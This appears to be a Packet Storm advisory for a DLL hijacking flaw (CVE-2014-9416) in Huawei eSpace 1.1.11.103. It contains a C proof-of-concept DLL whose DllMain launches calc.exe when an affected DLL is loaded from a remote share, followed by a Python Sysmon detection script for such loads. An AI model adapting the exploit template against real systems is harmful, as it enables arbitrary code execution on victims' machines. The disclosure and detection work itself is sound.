Huawei eSpace 1.1.11.103 DLL Hijacking

Published: 17 May 2019 00:00:00
Reported by: LiquidWorm
Type: packetstorm
Source: packetstormsecurity.com

Huawei eSpace 1.1.11.103 DLL Hijacking Vulnerability Description and Patc

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Huawei eSpace 1.1.11.103 - DLL Hijacking Exploit | 19 May 2019 00:00 | zdt |
| CNVD | Huawei eSpace Desktop V200R003C00 has multiple untrusted search path vulnerabilities | 4 Jan 2015 00:00 | cnvd |
| CVE | CVE-2014-9416 | 24 Dec 2014 18:00 | cve |
| Cvelist | CVE-2014-9416 | 24 Dec 2014 18:00 | cvelist |
| Exploit DB | Huawei eSpace 1.1.11.103 - DLL Hijacking | 20 May 2019 00:00 | exploitdb |
| EUVD | EUVD-2014-9237 | 7 Oct 2025 00:30 | euvd |
| exploitpack | Huawei eSpace 1.1.11.103 - DLL Hijacking | 20 May 2019 00:00 | exploitpack |
| Huawei | Security Advisory-Multiple Vulnerabilities in Huawei eSpace Desktop Product | 17 Dec 2014 00:00 | huawei |
| NVD | CVE-2014-9416 | 24 Dec 2014 18:59 | nvd |
| Prion | Design/Logic Flaw | 24 Dec 2014 18:59 | prion |

Code
```c
/*

Huawei eSpace Desktop DLL Hijacking Vulnerability


Vendor: Huawei Technologies Co., Ltd.
Product web page: https://www.huawei.com
Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)

Summary: Create more convenient Enhanced Communications (EC) services for your
enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines
voice, data, video, and service streams, and provides users with easy and secure
access to their service platform from any device, in any place, at any time. The
eSpace Meeting allows you to join meetings that support voice, data, and video
functions using the PC client, the tablet client, or an IP phone, or in a meeting
room with an MT deployed.

Desc: eSpace suffers from a DLL Hijacking issue. The vulnerability is caused due
to the application loading libraries (mfc71enu.dll, mfc71loc.dll, tcapi.dll and
airpcap.dll) in an insecure manner. This can be exploited to load arbitrary libraries
by tricking a user into opening a related application file (.html, .jpg, .png)
located on a remote WebDAV or SMB share.

Tested on: Microsoft Windows 7 Professional


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

19.08.2014

Patched version: V200R003C00
Vuln ID: HWPSIRT-2014-1153 and HWPSIRT-2014-1154
CVE ID: CVE-2014-9416
Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589

*/


// gcc -shared -o mfc71enu.dll exploit.c

#include <windows.h>

int exec(void);  // forward declaration; exec() is defined below DllMain

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
    // The loader calls DllMain on every notification (dwReason is not checked),
    // so exec() runs as soon as the DLL is loaded.
    exec();
    return 0;
}

int exec()
{
    // Proof-of-concept payload: opens the Windows calculator.
    WinExec("calc.exe", SW_NORMAL);
    return 0;
}
```
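
A detection-side view of the flaw described in the advisory above, as an added example that is not part of the original advisory: it checks Sysmon image-load (Event ID 7) records for the four named DLLs being loaded from a UNC path (SMB or WebDAV) or from outside the loading process's own folder. The install path `C:\Program Files\eSpace\eSpace.exe` and the sample events are constructed, and the list of accepted system directories is an assumption.

```python
import ntpath

# DLL names the advisory lists as loaded insecurely by eSpace 1.1.11.103.
WATCHED_DLLS = {"mfc71enu.dll", "mfc71loc.dll", "tcapi.dll", "airpcap.dll"}
# Assumption: system locations accepted in addition to the process's own folder.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")


def normalize(path):
    # Lower-case the path and unwrap the long-path prefixes (\\?\ and \\?\UNC\).
    p = path.lower()
    if p.startswith("\\\\?\\unc\\"):
        return "\\\\" + p[8:]
    if p.startswith("\\\\?\\"):
        return p[4:]
    return p


def under(folder, root):
    return folder == root or folder.startswith(root + "\\")


def classify(event):
    # event: dict carrying the Sysmon Event ID 7 fields "Image" and "ImageLoaded".
    loaded = normalize(event["ImageLoaded"])
    if ntpath.basename(loaded) not in WATCHED_DLLS:
        return None
    if loaded.startswith("\\\\"):
        return "remote-share"  # UNC path: SMB share or WebDAV (\\host@SSL\DavWWWRoot\...)
    folder = ntpath.dirname(loaded)
    app_dir = ntpath.dirname(normalize(event["Image"]))
    if folder == app_dir or any(under(folder, d) for d in SYSTEM_DIRS):
        return None
    return "outside-app-dir"  # e.g. a mapped network drive or a user-writable folder


def suspicious_loads(events):
    return [(e["ImageLoaded"], v) for e in events if (v := classify(e))]


APP = r"C:\Program Files\eSpace\eSpace.exe"  # hypothetical install path
SAMPLE_EVENTS = [  # constructed sample records, not taken from a real host
    {"Image": APP, "ImageLoaded": r"C:\Program Files\eSpace\mfc71enu.dll"},
    {"Image": APP, "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
    {"Image": APP, "ImageLoaded": r"\\fileserver\public\docs\tcapi.dll"},
    {"Image": APP, "ImageLoaded": r"\\intranet@SSL\DavWWWRoot\pics\airpcap.dll"},
    {"Image": APP, "ImageLoaded": r"Z:\shared\MFC71LOC.DLL"},
]
```

`suspicious_loads(SAMPLE_EVENTS)` returns the last three records; the copy loaded from the application folder and the unrelated system DLL are ignored.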

Vulners AI Score: 0.2 (Low risk)
EPSS: 0.00075